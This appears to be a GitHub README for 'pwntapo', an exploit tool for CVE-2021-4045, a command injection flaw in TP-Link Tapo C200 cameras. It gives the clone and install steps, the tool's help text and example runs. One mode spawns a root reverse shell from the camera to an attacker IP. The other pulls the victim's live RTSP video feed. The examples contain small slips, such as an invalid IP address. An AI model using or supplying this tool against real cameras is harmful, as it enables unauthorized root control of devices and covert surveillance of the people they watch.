π "PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)" π
Read about the exploit from exploit db
This is a command injection vulnerability that affect all TP-Link Tapo c200 camera firmware versions < 1.1.16 Build 211209 Rel. 37726N. To read more about how the exploit works read this article from hacefresko
git clone https://github.com/B3nj4h/CVE-2021-4045.git
cd CVE-2021-4045
pip install -r requirements.txt
python3 pwntapo.py -h
python3 pwntapo.py -h
============================================================================================
@Pl4inT3XT
_______ ________ ___ ___ ___ __ _ _ ___ _ _ _____
/ ____\ \ / / ____| |__ \ / _ \__ \/_ | | || | / _ \| || | | ____|
| | \ \ / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__
| | \ \/ / | __|______/ /| | | |/ / | |______|__ _| | | |__ _|___ \
| |____ \ / | |____ / /_| |_| / /_ | | | | | |_| | | | ___) |
\_____| \/ |______| |____|\___/____||_| |_| \___/ |_| |____/
============================================================================================
usage: pwntapo.py [-h] -M M [-U U] [-P P] [-C C] -H H -A A -p P [-v]
PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)
options:
-h, --help show this help message and exit
-M M attack mode : shell | rtsp (default: None)
-U U RTSP_USER (default: None)
-P P RTSP_PASSWORD (default: None)
-C C RTSP_CIPHERTEXT (default: None)
-H H victim ip address (default: None)
-A A attacker ip address (default: None)
-p P Listening port (default: None)
-v increase output verbosity (default: False)The exploit has two modes SHELL and RSTP.
In the shell mode you need to provide the victim ip, attacker ip and the listening port only and this will spawn a root shell in the device.
python3 pwntapo.py -M shell -H 192.168.110.121 -A 172.334.121.10 -p 1887
============================================================================================
@Pl4inT3XT
_______ ________ ___ ___ ___ __ _ _ ___ _ _ _____
/ ____\ \ / / ____| |__ \ / _ \__ \/_ | | || | / _ \| || | | ____|
| | \ \ / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__
| | \ \/ / | __|______/ /| | | |/ / | |______|__ _| | | |__ _|___ \
| |____ \ / | |____ / /_| |_| / /_ | | | | | |_| | | | ___) |
\_____| \/ |______| |____|\___/____||_| |_| \___/ |_| |____/
============================================================================================
[+] Listening on port 1887...
[+] Sending reverse shell to 192.168.110.121...
Listening on 0.0.0.0 1887In the RSTP mode you'll need to provide the RSTP_USER, PASSWORD AND CIPHERTEXT to be able to get a live footage from the camera
python3 pwntapo.py -M shelrstp -H 192.168.110.121 -A 192.168.110.131 -p 1887 -U pwneduser -P pwnedpasswd -C RUW5pUYSBm4gt+5T7bzwEq5r078rcdhSvpJrmtqAKE2mRo8bvvOLfYGnr5GNHfANBeFNEHhucnsK86WJTs4xLEZMbxUS73gPMTYRsEBV4EaKt2f5h+BkSbuh0WcJTHl5FWMbwikslj6qwTX48HasSiEmotK+v1N3NLokHCxtU0k=
============================================================================================
@Pl4inT3XT
_______ ________ ___ ___ ___ __ _ _ ___ _ _ _____
/ ____\ \ / / ____| |__ \ / _ \__ \/_ | | || | / _ \| || | | ____|
| | \ \ / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__
| | \ \/ / | __|______/ /| | | |/ / | |______|__ _| | | |__ _|___ \
| |____ \ / | |____ / /_| |_| / /_ | | | | | |_| | | | ___) |
\_____| \/ |______| |____|\___/____||_| |_| \___/ |_| |____/
============================================================================================
[+] Setting up RTSP video stream...